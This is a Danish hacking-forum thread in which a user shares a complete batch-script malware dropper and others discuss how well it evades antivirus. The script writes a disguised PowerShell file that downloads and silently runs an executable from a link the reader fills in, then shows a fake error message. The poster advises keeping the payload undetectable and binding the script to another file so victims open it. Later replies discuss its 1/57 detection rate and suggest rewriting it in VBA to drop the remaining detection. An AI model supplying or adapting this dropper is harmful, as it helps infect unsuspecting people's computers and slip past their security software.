Denne side bruger cookies
Dette forum bruger cookies. Hvis du er registreret, bruges de til at huske hvem du er logget ind som. Hvis ikke, gemmer vi dit sidste besøgstidspunkt. Besøgstidspunktet bruges bl.a. til at holde øje med, hvilke tråde du allerede har læst. Cookies er små tekstdokumenter, som bliver gemt i din browser og udgør ingen sikkerhedsrisiko. Tryk "Mere Information" nedenfor, for en liste over de cookies vi sætter. Du har mulighed for at fravælge cookies ved at klikke på knappen "Blokér Cookies" i bunden af denne boks.

En ikke-personhenførbar cookie vil blive gemt i din browser, uanset dit valg (Medmindre du ikke foretager et). Således undgår du at blive spurgt igen. Du kan til enhver tid ændre dit valg via linket i bunden af siden.

Tråd bedømmelse:
  • 0 Stemmer - 0 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
Simpelt FUD Batch script med file dropper
02-02-2016, 20:15
#1
Simpelt FUD Batch script med file dropper
Bare lige et lille batchscript jeg har liggende som downloader en fil til /temp/file og derefter executer den så du for en succesfull installation af din fil
Filen skal selvfølgelig helst være Runtime FUD men selv filer med detektioner kommer ofte igennem.

Batch scripted er lidt tricky at få folk til at åbne, men den kan da bindes til en anden fil.

Destinationen på filen kan  ændres i scripted med lidt basal batch script forståelse.

Kode:
@echo off
mkdir %tmp%\file\  > nul 2> nul
echo Please wait, loading...
echo $down = New-Object System.Net.WebClient > %tmp%\file\flash_log_backup.ps1
echo $url  = 'INDSÆT DIRECT DOWNLOAD LINK HER'; >> %tmp%\file\flash_log_backup.ps1
echo $file = '%tmp%\file\flash_log_backup.exe'; >> %tmp%\file\flash_log_backup.ps1
echo $down.DownloadFile($url,$file); >> %tmp%\file\flash_log_backup.ps1
echo $exec = New-Object -com shell.application >> %tmp%\file\flash_log_backup.ps1
echo $exec.shellexecute($file); >> %tmp%\file\flash_log_backup.ps1
powershell.exe -executionpolicy bypass -file %tmp%\file\flash_log_backup.ps1
echo msgbox "ERR?R!" > %tmp%\tmp.vbs
cscript /nologo %tmp%\tmp.vbs
del %tmp%\tmp.vbs
exit
Find alle beskeder fra denne bruger
Citer denne besked i et svar
26-04-2019, 23:46
#2
RE: Simpelt FUD Batch script med file dropper
Og 3 år efter er det 1/57

Utroligt at AV ikke vil genkende så simpelt et script
Find alle beskeder fra denne bruger
Citer denne besked i et svar
29-04-2019, 09:46
#3
RE: Simpelt FUD Batch script med file dropper
batch til at køre PS.. tjaaa baaah...
Don't learn to hack, hack to learn
Find alle beskeder fra denne bruger
Citer denne besked i et svar
29-04-2019, 21:51
#4
RE: Simpelt FUD Batch script med file dropper
(26-04-2019, 23:46)$$$ Skrev: Og 3 år efter er det 1/57

Utroligt at AV ikke vil genkende så simpelt et script

Hvad skulle en AV genkende?
Det er bestemt ikke malware... Det er et meget simpelt script, af en type og funktionalitet som bruges til administrative funktioner i rigtigt mange sammenhænge.
At tro at dette skulle være andet en FUD ville være en fejltagelse, og at se en enkelt på VT virker underligt. Scriptet laver ikke noget du ikke kunne klarer på utroligt mange måder. Skriv det som VBA og skift option-parameter navne så fjerne du nok den ene detection.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
06-05-2019, 13:42
#5
RE: Simpelt FUD Batch script med file dropper
(29-04-2019, 21:51)duckman Skrev: Hvad skulle en AV genkende?
Det er bestemt ikke malware... Det er et meget simpelt script, af en type og funktionalitet som bruges til administrative funktioner i rigtigt mange sammenhænge.
At tro at dette skulle være andet en FUD ville være en fejltagelse, og at se en enkelt på VT virker underligt. Scriptet laver ikke noget du ikke kunne klarer på utroligt mange måder. Skriv det som VBA og skift option-parameter navne så fjerne du nok den ene detection.

Du har nok ret, jeg har ikke rigtigt rodet så meget med batch, og da slet ikke i forbindelse med malware, det dog en forholdsvis effektiv måde at droppe en .exe på. Skrev det for længe siden, og du har ret, der jo egentlig ikke noget der skriger malware i det.

Det har da også et ret begrænset brug, og er helt sikkert ikke raket videnskab, men handy at have liggende til refference osv.
Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)